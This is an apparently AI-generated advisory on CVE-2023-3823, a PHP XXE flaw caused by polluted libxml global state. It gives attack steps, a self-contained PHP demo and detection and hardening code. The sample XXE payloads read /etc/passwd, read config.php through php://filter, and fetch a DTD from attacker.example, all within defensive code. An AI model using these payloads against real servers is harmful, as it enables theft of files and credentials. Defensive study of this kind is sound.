CVE-2023-3823 Overview
CVE-2023-3823 is an XML External Entity (XXE) vulnerability affecting PHP versions 8.0.* before 8.0.30, 8.1.* before 8.1.22, and 8.2.* before 8.2.8. The vulnerability arises from PHP's XML functions relying on libxml global state to track configuration variables, including whether external entities are loaded. When other modules such as ImageMagick operate within the same process and modify this global state, external entity loading can be inadvertently enabled, leading to potential disclosure of local files accessible to PHP.
Critical Impact
This vulnerability can lead to unauthorized disclosure of sensitive local files accessible to PHP, potentially exposing configuration files, credentials, and other confidential data. The vulnerable state may persist across multiple requests until the process is shut down.
Affected Products
- PHP 8.0.* before 8.0.30
- PHP 8.1.* before 8.1.22
- PHP 8.2.* before 8.2.8
- Fedora 38
- Debian Linux 10.0
Discovery Timeline
- August 11, 2023 - CVE-2023-3823 published to NVD
- February 13, 2025 - Last updated in NVD database
Technical Details for CVE-2023-3823
Vulnerability Analysis
This XXE vulnerability stems from PHP's architecture around libxml configuration management. PHP's XML parsing functions depend on libxml's process-global state to determine security-critical settings, particularly the configuration for loading external entities. The core issue is that PHP assumes this global state remains unchanged unless explicitly modified by user code calling the appropriate PHP functions.
In practice, however, other code loaded into the same PHP process also links libxml. ImageMagick, the case the advisory names (it ends up inside a PHP worker through an extension such as imagick), sets libxml's process-global defaults for its own XML handling and may leave them with external entity loading enabled. Every PHP XML parse that follows in that worker then runs under that configuration, although the PHP code never asked for it.
The vulnerability enables attackers to craft malicious XML payloads that reference external entities pointing to local files. When processed by an affected PHP application, the parser resolves these external entity references and includes the contents of the targeted files in the parsed output. This can expose sensitive files such as /etc/passwd, application configuration files containing database credentials, or other confidential data accessible to the PHP process.
The persistent nature of this vulnerability is particularly concerning—once triggered, the vulnerable state can persist across many HTTP requests until the PHP process is recycled, expanding the attack window significantly.
Root Cause
The root cause is PHP's reliance on process-global libxml state for tracking security-sensitive XML parser configuration. The CWE-611 (Improper Restriction of XML External Entity Reference) classification reflects the fundamental issue: when external entity loading is unintentionally enabled through cross-module state pollution, XML parsing becomes susceptible to XXE attacks. The design assumption that global state would only be modified through explicit PHP function calls fails to account for shared library usage patterns in complex application stacks.
Attack Vector
The attack vector is network-based and requires no authentication or user interaction. An attacker exploits the vulnerability by:
- Submitting crafted XML to a PHP application that parses XML input (for example a SOAP, feed, or file-import endpoint)
- Declaring, in that XML, an external entity whose SYSTEM identifier references a local file (e.g. file:///etc/passwd) and referencing it from element content
- Relying on the libxml global state having been left by another module with external entity loading enabled, so that the parser resolves the reference
- Collecting the file contents wherever the application echoes, stores, or logs the parsed values
The vulnerability is exploitable when the XML parsing occurs after another library (such as ImageMagick) has modified the libxml global state within the same process. This condition may occur unpredictably based on request ordering and process reuse patterns.
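As an added illustration of the mechanism above (example code written for this page, not code from PHP or the advisory), the script below feeds one XXE payload to DOMDocument twice. The first parse uses PHP's normal options, under which the external entity stays unresolved; the second passes LIBXML_NOENT | LIBXML_DTDLOAD to stand in for the libxml state another module can leave behind, and the file contents appear in the parsed document. The "secret" file is created by the script itself. Nothing here reproduces the cross-module pollution, which needs a second libxml user such as ImageMagick in the same process; the flags only simulate its effect.

```php
<?php
declare(strict_types=1);

// Added example for this page (not code from PHP or the advisory).
// Shows the same XXE payload parsed under two entity-loading states.

// Constructed stand-in for a sensitive file such as /etc/passwd or a
// config file holding database credentials; removed again at the end.
$secretPath = tempnam(sys_get_temp_dir(), 'xxe');
file_put_contents($secretPath, "db_password=hunter2\n");

// Attacker-controlled document: an external general entity whose SYSTEM
// identifier points at a local file, referenced from element content.
$payload = <<<XML
<?xml version="1.0"?>
<!DOCTYPE order [
  <!ENTITY xxe SYSTEM "file://{$secretPath}">
]>
<order><note>&xxe;</note></order>
XML;

/**
 * Parse $xml with the given libxml option bits and return the text of
 * <note>, or a marker string when the document is rejected.
 */
function parseNote(string $xml, int $options): string
{
    $prev = libxml_use_internal_errors(true);   // collect parser errors instead of printing them
    $doc = new DOMDocument();
    $ok = $doc->loadXML($xml, $options);
    $errors = libxml_get_errors();
    libxml_clear_errors();
    libxml_use_internal_errors($prev);

    if (!$ok) {
        return '<rejected: ' . trim($errors[0]->message ?? 'unknown error') . '>';
    }
    $note = $doc->getElementsByTagName('note')->item(0);
    return $note === null ? '<no note element>' : $note->textContent;
}

// 1) PHP's own default: no NOENT/DTDLOAD, so the external entity is never
//    fetched and the reference stays unresolved (empty text).
$default = parseNote($payload, 0);

// 2) What CVE-2023-3823 amounts to: libxml behaving as if entity substitution
//    and DTD loading were on, even though the PHP code never asked for it.
//    Simulated here by passing the flags explicitly.
$polluted = parseNote($payload, LIBXML_NOENT | LIBXML_DTDLOAD);

printf("default options : %s\n", json_encode($default));
printf("polluted state  : %s\n", json_encode($polluted));

unlink($secretPath);
```

The point of the two-way comparison is that the application code is identical in both runs; only the parser's effective configuration differs, which is exactly what a patched PHP now pins down per parse instead of inheriting from the process.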
Detection Methods for CVE-2023-3823
Indicators of Compromise
- Unexpected file read operations by PHP processes, particularly targeting sensitive system files like /etc/passwd or application configuration files
- XML payloads in HTTP requests containing external entity declarations with file://, php://, or other protocol handlers
- Error logs showing attempts to access files outside normal application scope during XML parsing operations
- Unusual outbound connections from PHP processes if external DTD or entity URLs are used in attacks
Detection Strategies
- Monitor web application firewall (WAF) logs for XML requests containing DTD declarations or external entity references
- Implement file integrity monitoring on sensitive configuration files that could be targeted
- Review PHP error logs for libxml messages such as "failed to load external entity"; these record loads that were refused or unreadable, not successful ones, so a successful exploit leaves no such line and their absence proves nothing
- Deploy network monitoring to detect unexpected outbound connections from web server processes
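The strategies above can be turned into concrete matching logic. The following is an added example written for this page (not the advisory's or any vendor's detection content): it classifies XML request bodies by the XXE indicators listed, scoping URI-scheme checks to the SYSTEM/PUBLIC identifiers inside a DTD so that ordinary xmlns="http://..." values do not fire, and it recognises the libxml load-failure line in PHP error logs. All request bodies and log lines are constructed samples; the severity labels are this example's own convention.

```php
<?php
declare(strict_types=1);

// Added example for this page (not the advisory's or any vendor's code):
// classify XML request bodies and PHP error-log lines by XXE indicators.
// Runs over constructed samples; in production feed it from a WAF, PHP
// middleware or a log-replay job, and alert rather than block until
// legitimate DTD-using clients have been tuned out.

const XXE_DECLARATION_PATTERNS = [
    'dtd_declared'     => '/<!DOCTYPE\b/',
    'entity_declared'  => '/<!ENTITY\b/',
    'parameter_entity' => '/<!ENTITY\s+%/',   // %name; entities: building block of OOB exfiltration
];

// External identifiers only occur inside a DTD, so capturing the URI scheme
// after SYSTEM/PUBLIC avoids flagging ordinary namespace URIs in elements.
const XXE_EXTERNAL_ID_PATTERNS = [
    '/\bSYSTEM\s+["\']([a-z][a-z0-9+.\-]*):/i',
    '/\bPUBLIC\s+["\'][^"\']*["\']\s*["\']([a-z][a-z0-9+.\-]*):/i',
];

const XXE_SCHEME_CLASSES = [
    'file'   => 'local_file_read',
    'php'    => 'php_stream_wrapper',   // php://filter base64 read of PHP source
    'phar'   => 'php_stream_wrapper',
    'glob'   => 'php_stream_wrapper',
    'data'   => 'php_stream_wrapper',
    'expect' => 'php_stream_wrapper',   // command execution if the expect extension is loaded
    'http'   => 'network_callback',     // remote DTD or out-of-band exfiltration
    'https'  => 'network_callback',
    'ftp'    => 'network_callback',
];

/** Scan one XML request body (assumed UTF-8; transcode UTF-16 bodies first). */
function scanXmlBody(string $body): array
{
    $indicators = [];
    foreach (XXE_DECLARATION_PATTERNS as $name => $re) {
        if (preg_match($re, $body) === 1) {
            $indicators[] = $name;
        }
    }
    $externalLoads = 0;
    foreach (XXE_EXTERNAL_ID_PATTERNS as $re) {
        preg_match_all($re, $body, $m);
        foreach ($m[1] as $scheme) {
            $indicators[] = XXE_SCHEME_CLASSES[strtolower($scheme)] ?? 'other_scheme:' . strtolower($scheme);
            $externalLoads++;
        }
    }
    $indicators = array_values(array_unique($indicators));

    if ($indicators === []) {
        $severity = 'none';
    } elseif ($externalLoads > 0 || in_array('parameter_entity', $indicators, true)) {
        $severity = 'high';     // something outside the document would be fetched
    } elseif (in_array('entity_declared', $indicators, true)) {
        $severity = 'medium';   // internal entities only; still suspicious (entity expansion)
    } else {
        $severity = 'low';      // bare DOCTYPE, e.g. <!DOCTYPE html> pasted into an XML field
    }
    return ['severity' => $severity, 'indicators' => $indicators];
}

/** libxml reports a refused or unreadable entity with this text; a successful read produces no line. */
function isEntityLoadFailure(string $logLine): bool
{
    return preg_match('/failed to load external entity/i', $logLine) === 1;
}

// Constructed samples: one benign body, three attack bodies, two log lines.
$samples = [
    'benign'     => '<order xmlns="http://example.com/orders"><id>42</id></order>',
    'file_read'  => '<!DOCTYPE x [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><x>&xxe;</x>',
    'php_filter' => '<!DOCTYPE x [<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=config.php">]><x>&xxe;</x>',
    'oob_dtd'    => '<!DOCTYPE x [<!ENTITY % dtd SYSTEM "http://attacker.example/evil.dtd"> %dtd;]><x/>',
];
foreach ($samples as $label => $body) {
    $r = scanXmlBody($body);
    printf("%-10s severity=%-6s %s\n", $label, $r['severity'], implode(',', $r['indicators']));
}

$logLines = [   // constructed, in PHP's default error_log format
    '[07-Aug-2023 10:11:12 UTC] PHP Warning:  DOMDocument::loadXML(): I/O warning : failed to load external entity "file:///etc/shadow" in /var/www/app/import.php on line 12',
    '[07-Aug-2023 10:11:13 UTC] PHP Warning:  Undefined array key "id" in /var/www/app/import.php on line 30',
];
foreach ($logLines as $line) {
    printf("%s  %s\n", isEntityLoadFailure($line) ? 'ALERT ' : 'ignore', substr($line, 0, 70));
}
```

Treat the body scanner as a detection of attempts: a request that scores high has tried to make the parser fetch something, whether or not the worker's libxml state would have let it succeed.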
Monitoring Recommendations
- PHP has no verbose logging switch for its XML parsers; instead, register a resolver with libxml_set_external_entity_loader() that logs (and refuses) every external entity request, and collect parser errors with libxml_use_internal_errors(true) and libxml_get_errors()
- Implement centralized log analysis to correlate XML processing events with file access patterns
- Set up alerts for access to sensitive file paths by PHP-FPM or Apache/nginx worker processes
- Prefer file-access auditing (for example auditd watches on the sensitive paths, filtered to the PHP-FPM worker user) over resource-usage heuristics: a single XXE read is not a memory or CPU spike and will not show up in resource monitoring
How to Mitigate CVE-2023-3823
Immediate Actions Required
- Upgrade PHP to patched versions: 8.0.30 or later, 8.1.22 or later, or 8.2.8 or later
- Review and apply security updates from your operating system vendor (Debian, Fedora, or other distributions)
- Audit applications for XML processing functionality that may be affected
- Consider temporarily disabling XML parsing features if immediate patching is not possible
Patch Information
PHP has released security patches addressing this vulnerability in versions 8.0.30, 8.1.22, and 8.2.8. The fix makes PHP set the security-relevant libxml parser settings explicitly around each XML parsing operation instead of trusting the process-global defaults, so state left behind by another module can no longer enable external entity loading for PHP's parsers. For additional details, refer to the PHP Security Advisory on GitHub.
Distribution-specific patches are available:
Workarounds
- Call libxml_disable_entity_loader(true) before any XML parsing (deprecated since PHP 8.0 and emits a deprecation notice, but still functional)
- Register a resolver via libxml_set_external_entity_loader() that returns null for every request, so no external entity can be fetched regardless of libxml's global defaults; reset it with libxml_set_external_entity_loader(null) afterwards
- Run applications that drive ImageMagick and applications that parse untrusted XML in separate PHP-FPM pools; the polluted state is per worker process, so a worker that never executes ImageMagick's XML code keeps libxml's defaults
- Reject XML documents that contain a DOCTYPE or ENTITY declaration before handing them to the parser
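The two code-level workarounds above combine into a single parse wrapper. The block below is an added example written for this page (not code from PHP or the advisory): layer 1 rejects any DTD before libxml sees it, and layer 2 installs an entity loader that refuses every external resolution for the duration of the parse, so a left-behind "load entities" state cannot read files. PHP's API does not return the previously active loader, so the wrapper reinstates PHP's default loader with libxml_set_external_entity_loader(null) afterwards; the class and function names are this example's own, and the demo input is constructed.

```php
<?php
declare(strict_types=1);

// Added example for this page (not code from PHP or the advisory):
// a parse wrapper that does not trust process-global libxml state.

final class UntrustedXmlRejected extends RuntimeException {}

/** Layer 1: no DTD, no entity declarations. Assumes UTF-8 input. */
function rejectDtd(string $xml): void
{
    // A UTF-16 body would hide "<!DOCTYPE" from a byte-level regex, so demand
    // valid UTF-8 (transcode first if other encodings must be accepted).
    if (preg_match('//u', $xml) !== 1) {
        throw new UntrustedXmlRejected('body is not valid UTF-8');
    }
    if (preg_match('/<!(?:DOCTYPE|ENTITY)\b/i', $xml) === 1) {
        throw new UntrustedXmlRejected('DTD or entity declaration is not allowed');
    }
}

/** Layer 2: parse with every external entity load refused and recorded. */
function parseWithEntitiesBlocked(string $xml, int $options = 0): DOMDocument
{
    $attempted = [];
    libxml_set_external_entity_loader(
        function (?string $publicId, ?string $systemId, array $context) use (&$attempted): ?string {
            $attempted[] = $systemId ?? $publicId ?? '(unnamed)';
            return null;   // null means "cannot load": libxml records an I/O error, nothing is read
        }
    );
    $prevErrors = libxml_use_internal_errors(true);
    try {
        $doc = new DOMDocument();
        $ok = $doc->loadXML($xml, $options | LIBXML_NONET);
        $errors = libxml_get_errors();
    } finally {
        libxml_clear_errors();
        libxml_use_internal_errors($prevErrors);
        libxml_set_external_entity_loader(null);   // back to PHP's default loader
    }
    // Whether libxml treated the refused load as fatal or carried on with an
    // empty entity, the document is discarded if anything was attempted.
    if ($attempted !== []) {
        throw new UntrustedXmlRejected('external entity load blocked: ' . implode(', ', $attempted));
    }
    if (!$ok) {
        throw new UntrustedXmlRejected('parse error: ' . trim($errors[0]->message ?? 'unknown'));
    }
    return $doc;
}

function parseUntrustedXml(string $xml): DOMDocument
{
    rejectDtd($xml);
    return parseWithEntitiesBlocked($xml);
}

// Demo on constructed input.
$benign  = '<order><id>42</id></order>';
$payload = '<!DOCTYPE x [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><x>&xxe;</x>';

printf("benign: parsed root <%s>\n", parseUntrustedXml($benign)->documentElement->tagName);

$attempts = [
    'layer 1 (DTD rejected)' => fn() => parseUntrustedXml($payload),
    // Layer 2 on its own, with the flags that mirror a polluted global state:
    'layer 2 (loader blocks)' => fn() => parseWithEntitiesBlocked($payload, LIBXML_NOENT | LIBXML_DTDLOAD),
];
foreach ($attempts as $label => $attempt) {
    try {
        $attempt();
        printf("%s: parsed (unexpected)\n", $label);
    } catch (UntrustedXmlRejected $e) {
        printf("%s: %s\n", $label, $e->getMessage());
    }
}
```

Layer 2 is what actually addresses this CVE's failure mode: it does not matter what the global defaults say when the loader libxml calls refuses to hand back any input. Layer 1 is cheaper and gives a clear error, but on its own it relies on the regex seeing the same bytes the parser will.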
Configuration example for PHP-FPM pool isolation. The image-handling application and the XML-parsing application get separate pools, hence separate worker processes, and the web server routes each application's endpoints to the matching socket. Pools under one php-fpm master still share the extensions loaded from php.ini, so this separates which code runs in which worker rather than unloading imagick; that is sufficient because only ImageMagick's XML handling actually changes the libxml globals.
; /etc/php-fpm.d/imagemagick-pool.conf
; Workers for the application that drives ImageMagick
[imagemagick_pool]
user = www-data
group = www-data
listen = /run/php-fpm/imagemagick.sock
pm = dynamic
pm.max_children = 10
pm.start_servers = 2
pm.min_spare_servers = 1
pm.max_spare_servers = 4
; /etc/php-fpm.d/xml-pool.conf
; Workers for the application that parses untrusted XML; no ImageMagick work runs here
[xml_pool]
user = www-data
group = www-data
listen = /run/php-fpm/xml.sock
pm = dynamic
pm.max_children = 20
pm.start_servers = 4
pm.min_spare_servers = 2
pm.max_spare_servers = 8
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.